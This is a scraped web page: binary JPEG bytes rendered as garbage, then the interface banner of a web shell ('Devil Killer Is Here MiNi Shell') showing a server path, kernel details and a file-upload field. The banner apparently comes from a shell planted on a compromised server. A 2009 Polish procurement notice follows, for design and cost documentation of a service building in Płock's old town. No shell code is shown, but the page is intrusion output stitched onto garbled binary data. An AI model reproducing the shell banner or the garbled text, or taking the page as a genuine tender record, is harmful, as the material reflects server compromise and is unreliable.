JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090407/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090407/95128-N-2009.html

<p class="kh_header"><b>Płock: Opracowanie dokumentacji projektowo-kosztorysowej dla zadania inwestycyjnego pn. Budowa budynku usługowego, przewidzianego do realizacji w Płocku przy ul. Stary Rynek 5 oraz zabudowy pierzejowej wzdłuż ul. Bielskiej z miejscami garażowymi w parterze - działki nr 682/4, 755/14, 755/16, 755/20, 755/28, 756 oraz 698/1/.</b><br>
<b>Numer ogłoszenia: 95128 - 2009; data zamieszczenia: 07.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rewitalizacji Starówki ARS Spółka z o.o. , ul. Stary Rynek 19, 09-400 Płock, woj. mazowieckie, tel. 024 3666150, faks 024 3666150.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ars.plock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo-kosztorysowej dla zadania inwestycyjnego pn. Budowa budynku usługowego, przewidzianego do realizacji w Płocku przy ul. Stary Rynek 5 oraz zabudowy pierzejowej wzdłuż ul. Bielskiej z miejscami garażowymi w parterze - działki nr 682/4, 755/14, 755/16, 755/20, 755/28, 756 oraz 698/1/..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowo-kosztorysowej wraz z uzyskaniem pozwolenia na budowę dla budynku usługowego 3 - kondygnacyjnego z poddaszem użytkowym i podpiwniczeniem na terenie działek nr 682/4 i 755/14 (ul. Stary Rynek 5) oraz dla zabudowy pierzejowej - niepodpiwniczonej z miejscami garażowymi w parterze na działkach nr 755/16, 755/20, 755/28 wzdłuż ul. Bielskiej oraz nadwieszeniem nad działką nr 756 i częściowo 698/1 wraz z zagospodarowaniem terenu  działki nr 698/1 i 756 w oparciu o:
- miejscowy plan zagospodarowania przestrzennego Bramy Bielskiej wraz z odcinkiem ul. Bielskiej w rejonie Starego średniowiecznego miasta oraz ulicą Kwiatka w mieście Płocku, uchwalony Uchwałą Nr 822/LIV/97 Rady Miasta Płocka z dnia 23 wrzesnia 1997 r. (Dz. Urz. Woj. Maz. Nr 13 z dn. 05.12.1997 poz. 125) - w zakresie działek nr ew. 682/4, 755/14, 755/16, 755/20, 755/28 - wypis z planu -  załącznik nr 6 do SIWZ,
- decyzję nr 258/2008 o warunkach zabudowy, wydaną pismem WUB.II.73311/201/2008 z dn. 12.12.2008 r., w zakresie działek nr ew. 698/1 i 756 - załącznik nr 7 do SIWZ,
-koncepcję architektoniczno - budowlaną - załącznik nr 8 do SIWZ,
-warunki przyłączenia do sieci gazowej wydane przez Mazowiecką Spółkę Gazownictwa Sp. z o.o., Oddział Zakład Gazowniczy Ciechanów, Rejon Dystrybucji Gazu Płock, ul. Łukasiewicza 19, 09-400 Płock, nr CRP-R230/145/2008 z dn. 03.10.2008 r., -   załącznik nr 11 do SIWZ,
- warunki techniczne zasilania w wodę oraz odprowadzenia ścieków sanitarnych i wód opadowych wydane przez Wodociągi Płockie pismem nr TT/5/6260/2008 z dn. 23.10.2008r  -  załącznik nr 9  do SIWZ,
-warunki techniczne przyłączenia do sieci elektroenergetycznej wydane przez Energę - Operatora S.A., Oddział w Płocku, nr 5417/2008 z dn. 10.10.2008 r., wraz z aneksem nr 1 z dn. 14.11.2008 r.,  - załącznik nr 10  do SIWZ,
-mapę d/c projektowych stanowiącą załącznik nr 12 do SIWZ,
-sprawozdanie z archeologicznych badań sondażowo-weryfikacyjnych -  załącznik nr 13 do SIWZ.

2. Lokalizacja i uzbrojenie terenu.
W/w teren położony jest na obszarze istniejącej zabudowy mieszkaniowo - usługowej  zlokalizowanej w centrum miasta na terenie zabytkowego śródmieścia. Działki objęte procesem projektowania są elementem zespołu urbanistyczno - architektonicznego i warstw kulturowych miasta Płocka, wpisanego do rejestru zabytków dawnego województwa płockiego pod nr 51/182/59 W, data wpisania 16.11.1959 r., a tym samym chronionego prawnie mocą ustawy o ochronie zabytków i opiece nad zabytkami( Dz.U. 2003 Nr 162, poz.1568 ze zm.).
W bezpośrednim sąsiedztwie działki znajdują sie następujące elementy infrastruktury technicznej:
-Linie kablowe eNN w ul. Synagogalnej, Bielskiej, Stary Rynek,
- Wodociąg PE fi 110 mm - w ul. Synagogalnej lub fi 160 mm - w ul. Bielskiej i Stary Rynek
-Kanalizacja sanitarna fi 0, 20 m w ul. Synagogalnej i ul. Bielskiej,
-Kanalizacja deszczowa fi 0, 25 m - w ul. Synagogalnej lub fi 0, 4 m - w ul. Bielskiej,
-Kanalizacja telefoniczna w ul. Bielskiej,
-Gazociąg PE fi 125 mm w ul. Bielskiej i fi 110 w Placu Stary Rynek.   
3. Na przedmiot zamówienia składają się w szczególności:
1)Badanie podłoża gruntowego i wykonanie dokumentacji geotechnicznej (w tym odkrywki fundamentów istniejących obiektów budowlanych, zlokalizowanych w sąsiedztwie planowanego budynku).
2)Wykonanie nowej mapy do celów projektowych w skali 1: 500. 
3)Uzyskanie wszelkich opinii, uzgodnień, oświadczeń i decyzji niezbędnych do uzyskania prawomocnego pozwolenia na budowę.
4)Wykonanie analizy w zakresie zachowania odległości budynków z pomieszczeniami przeznaczonymi na pobyt ludzi od innych obiektów, która powinna umożliwiać naturalne oświetlenie, a także analizy zapewnienia czasu nasłonecznienia pomieszczeń.
5)W razie konieczności uzyskanie warunków technicznych i innych wytycznych do projektowania niezbędnych do opracowania dokumentacji od odpowiednich jednostek wydających i opiniujących.
6)Opracowanie projektu budowlanego zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2003 r. Nr 120, poz. 1133 z późniejszymi zmianami). W szczególności z uwzględnieniem zmian wprowadzonych rozporządzeniem Ministra Infrastruktury z dnia 6 listopada 2008 roku w tym w zakresie charakterystyki energetycznej obiektu.
Na podstawie opracowanego projektu budowlanego należy wystąpić z wnioskiem o wydanie pozwolenia na budowę do Urzędu Miasta Płocka, Płock, Stary Rynek 1. Wcześniej należy:
-projekt zagospodarowania uzgodnić w Zespole Uzgadniania Dokumentacji,
-uzyskać uzgodnienia lub opinie Państwowego Powiatowego Inspektora Sanitarnego w Płocku lub rzeczoznawcy ds. sanitarnych, rzeczoznawcy ds. zabezpieczeń i ochrony przeciwpożarowej, rzeczoznawcy ds. BHP i ergonomii,
- wstępny projekt budowlany w zakresie kolorystyki uzgodnić z Plastykiem Miasta w Oddziale Komunikacji Społecznej Urzędu Miasta Płocka,
-projekt budowlany uzgodnić z geologiem w Oddziale Ochrony Środowiska Urzędu Miasta Płocka.
7)Opracowanie projektów wykonawczych wielobranżowych zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2004 r. Nr 202, poz. 2072 z późniejszymi zmianami).
Projekty wykonawcze stanowić będą podstawę dla wykonywania swoich funkcji przez kierownika budowy i inspektorów nadzoru oraz będą podstawą do sporządzenia dokumentacji powykonawczej podczas odbioru robót.

W skład dokumentacji wykonawczej będą wchodziły między innymi następujące opracowania branżowe:
a)Projekt architektoniczny.
b)Projekt konstrukcyjny.
c)Projekt zagospodarowania terenu (w tym branża drogowa),
d)Projekty przyłączy do budynku (woda, kanalizacja sanitarna, kanalizacja deszczowa), 
e)Projekt wewnętrznej instalacji wod-kan i c.w.u.,
f)Projekt wewnętrznej instalacji c.o. zasilanej z dwufunkcyjnych piecy gazowych, 
g)Projekt wewnętrznych instalacji elektrycznych i teletechnicznych, w tym również:
- system video-domofonowy obejmujący bramę i wejścia do budynku,
- automatyczny system zasilania bramy, 
- projekt iluminacji obiektu,
h)Projekt systemu przeciwpożarowego (należy zaprojektować system przeciwpożarowy z detekcją tlenku węgla, umożliwiający wykrycie pożaru już w jego wczesnym stadium),
i)Inne, nie wymienione wyżej projekty wykonawcze konieczne do realizacji obiektu i oddania go do użytkowania zgodnie z przepisami prawa,
j)Wizualizację obiektu, (co najmniej 10 ujęć),
k)Wizytówki każdego lokalu- rzuty lokali wraz z aranżacjami, przygotowane do prezentacji kupującym, z podaniem ich wymiarów ( w formacie JPG).

8) Wykonanie specyfikacji technicznych wykonania i odbioru robót ( wszystkie branże) zgodnie z  rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2004 r. Nr 202, poz. 2072 z późniejszymi zmianami).
9)Wykonanie kosztorysów inwestorskich dla projektów poszczególnych branż zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym ( Dz. U. z 2004 r. Nr 130, poz. 1389), wraz ze zbiorczym zestawieniem kosztów inwestycji.
10)Wykonanie przedmiarów robót (wszystkie branże) na bazie specyfikacji technicznych wykonania i odbioru robót zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. ( Dz. U. z 2004 r. Nr 202, poz. 2072 z późniejszymi zmianami),
11)Opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia.
12)Opracowanie harmonogramu realizacji robót.
13)Opracowanie opisu przedmiotu zamówienia dotyczącego wszystkich branż, niezbędnego do ogłoszenia przetargu na realizację inwestycji zgodnie z opracowanymi projektami wykonawczymi.
14)Uzyskanie pozwolenia na prowadzenie robót budowlanych od Miejskiego Konserwatora Zabytków w Płocku, Urząd Miasta Płocka, Płock, Stary Rynek 1.
15)Uzyskanie kompletu uzgodnień i wymaganych pozwoleń niezbędnych do uzyskania decyzji pozwolenia na budowę, wraz z jego uzyskaniem.
16)Opracowanie ewentualnych projektów usunięcia wszelkich kolizji z uzbrojeniem terenu.

Zaleca się konsultowanie projektu w trybie roboczym z Miejskim Konserwatorem Zabytków oraz z Zamawiającym.

Zamawiający musi ponad to uzgodnić w trybie roboczym układ funkcjonalny pomieszczeń zaproponowany przez architekta.

4. Wytyczne funkcjonalno-użytkowe.
1) Charakterystyka projektowanej zabudowy:
- powierzchnia zabudowy - ok. 430  m2,
- powierzchnia użytkowa lokali usługowych - ok. 930,00 m2,
- powierzchnia klatek schodowych - 220,00 m2,
- powierzchnia garażu w poziomie parteru - ok. 163,00 m2,
- powierzchnia razem - ok. 1 313,00 m2,
- kubatura - ok. 5 200,00 m3,
- szerokość zabudowy od ul. Stary Rynek - ok. 7,73 m,
- szerokość zabudowy od ul. Bielskiej - ok. 62,10 m,
- nachylenie dachu - dach jednospadowy o nachyleniu 20÷ 50 st
- wysokość projektowanej zabudowy - ok. 15,20 m,
- kierunek głównej kalenicy dachu w stosunku do frontu działki - równoległy.

2) Przeznaczenie budynku usługowe. Przeznaczenie szczegółowe poszczególnych pomieszczeń do zaproponowania przez projektantów i zatwierdzenia przez zamawiającego.
W stosunku do koncepcji Zamawiający wprowadza zmianę polegającą na podpiwniczeniu zabudowy projektowanej na terenie działek nr 682/4 i 755/14 (ul. Stary Rynek 5) i zaprojektowaniu dwupoziomowego lokalu gastronomicznego (parter i piwnica).

3) Zalecenia dotyczące instalacji wewnętrznych.
- instalacja wod.-kan. - indywidualne opomiarowanie zużycia wody - wodomierz oddzielnie dla każdego lokalu lub biura, armatura i urządzenia sanitarne w standardzie średnim,
- instalacja c.o. - rozprowadzenie instalacji w posadzkach, grzejniki z zaworami termostatycznymi, 
- instalacja gazowa -indywidualne gazomierze dla każdego lokalu usługowego lub biura,
- instalacja elektryczna - liczniki poboru energii oddzielnie dla każdego samodzielnego lokalu oraz oddzielny dla potrzeb administracyjnych,

4) Standard wykończenia jak również kolorystyka i elementy wykończenia elewacji do uzgodnienia bieżącego z Zamawiającym, Plastykiem Miasta i Konserwatorem Zabytków..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany wnieść wadium w wysokości 5.000,00 zł w formach zgodnych z przepisami ustawy Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy:
1.Posiadają uprawnienia do wykonywania działalności w zakresie objętym przedmiotem zamówienia tzn. prowadzoną działalność gospodarczą w w/w zakresie zarejestrowaną  w Krajowym Rejestrze Sądowym lub innym organie ewidencji działalności gospodarczej.
2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego  i osób zdolnych do wykonania zamówienia, tzn.:

1) Wykonawca musi dysponować osobami posiadającymi kwalifikacje odpowiednie    do stanowisk, które zostaną im powierzone lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, tj.:

a)co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej, 
b)co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń  w specjalności konstrukcyjno-budowlanej,
c)co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
d)co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.

2) Wykonawca musi wykazać, że posiada  doświadczenie zawodowe niezbędne do wykonania zamówienia, tj.:

a)Wykonał w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno opracowanie  dotyczące obiektu usługowego lub mieszkalno - usługowego, umiejscowionego na terenie objętym ochroną konserwatorską, o powierzchni użytkowej nie mniejszej niż 1000 m2.
b)Wykonał w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługi projektowe o wartości łącznej co najmniej w kwocie 500.000,00 zł netto.

3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.


Wykonawcy wspólnie ubiegający się  o udzielenie niniejszego zamówienia muszą wykazać, że:
a)warunek określony w pkt.  1 spełnia każdy z Wykonawców,
b)warunek określony w pkt. 2 ppkt 1 a, b, c, d,  i ppkt 2 a i b spełniają łącznie wszyscy Wykonawcy,
c)warunek określony w pkt. 3 spełniają łącznie wszyscy Wykonawcy,
d)warunek określony w pkt. 4  spełnia każdy z Wykonawców.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w systemie spełnia/ nie spełnia, na podstawie dokumentów wymienionych w Rozdziale VI..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. Do oferty należy załączyć następujące oświadczenia i dokumenty w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1.Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy - Załącznik  Nr 2 do SIWZ.
2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do  ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.
3.Aktualną informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1  pkt. 4-8 ustawy, wystawioną nie wcześniej niż 6  miesięcy przed upływem terminu składania ofert.
4.Aktualną informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1    pkt. 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że pozyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie   w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 2, 4, 5  - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzających odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne  i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
7.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 3  - składa zaświadczenie właściwego organu sadowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy.
8.Dokumenty, o których mowa w pkt. 6 litera a i c oraz w pkt. 7, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt. 6 litera b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
9.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 6 i 7, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Pkt. 8 stosuje się odpowiednio.
10.Wykaz wykonanych usług projektowych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o wartości łącznej co najmniej w kwocie 500.000,00 zł netto, przy czym co najmniej jedno opracowanie musi dotyczyć dokumentacji projektowej na budowę budynku usługowego lub mieszkalno-usługowego o powierzchni użytkowej nie mniejszej niż 1000 m2, umiejscowionego na terenie objętym ochroną konserwatorską, z podaniem ich wartości jednostkowych, przedmiotu, dat wykonania i odbiorców, oraz załączenie dokumentów potwierdzających, że usługi te zostały wykonane należycie - Załącznik Nr 3  do SIWZ. 
11.Wykaz osób i podmiotów, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - Załącznik Nr 4 do SIWZ. Należy również załączyć dokumenty stwierdzające, że osoby, które będą pełnić funkcje techniczne posiadają wymagane uprawnienia budowlane oraz są wpisane  na listę członków właściwej izby samorządu zawodowego i posiadają wymagane ubezpieczenie od odpowiedzialności cywilnej. 
12.Pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 11, wykonawca wskazał osoby, którymi będzie dysponował.
II. Do oferty należy załączyć również:
1.Wypełniony formularz oferty do Specyfikacji Istotnych Warunków Zamówienia podający cenę ryczałtową- Załącznik Nr 1 do SIWZ.
2.Dowód wniesienia wadium. Dowód wniesienia wadium w formie innej niż pieniężna należy załączyć  do oferty w formie oryginału.
3.Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio  z załączonych dokumentów. Załączone do oferty pełnomocnictwo winno być w formie oryginału lub kopii poświadczonej notarialnie.
4.Informacje dotyczące podwykonawców -  Załącznik Nr 5 do SIWZ. Jeżeli Wykonawca nie przewiduje zatrudnienia podwykonawców wpisuje nie dotyczy.
5.W przypadku złożenia oferty wspólnej:
- przedsiębiorcy występujący wspólnie muszą upoważnić jednego spośród siebie jako  przedstawiciela pozostałych - lidera do zaciągania zobowiązań i rozporządzania prawem w sprawach związanych z przedmiotem postępowania, a jego upoważnienie musi być udokumentowane pełnomocnictwem podpisanym przez pozostałych przedsiębiorców lub ich uprawnionych przedstawicieli.
W powyższym przypadku przedsiębiorcy winni złożyć zgodne oświadczenie woli dotyczące wskazania podmiotu  i jego  rachunku bankowego, przez który  przeprowadzane będą wszystkie operacje finansowe związane  z przedmiotem zamówienia.
Dokumenty, o których mowa w pkt. I. 1-5 oraz pkt.  II.3  winien załączyć każdy     z przedsiębiorców składających ofertę wspólną.
Dokumenty są składane w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ars.plock.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rewitalizacji Starówki ARS Sp. z o.o.
09-400 Płock, Stary Rynek 19.</p>
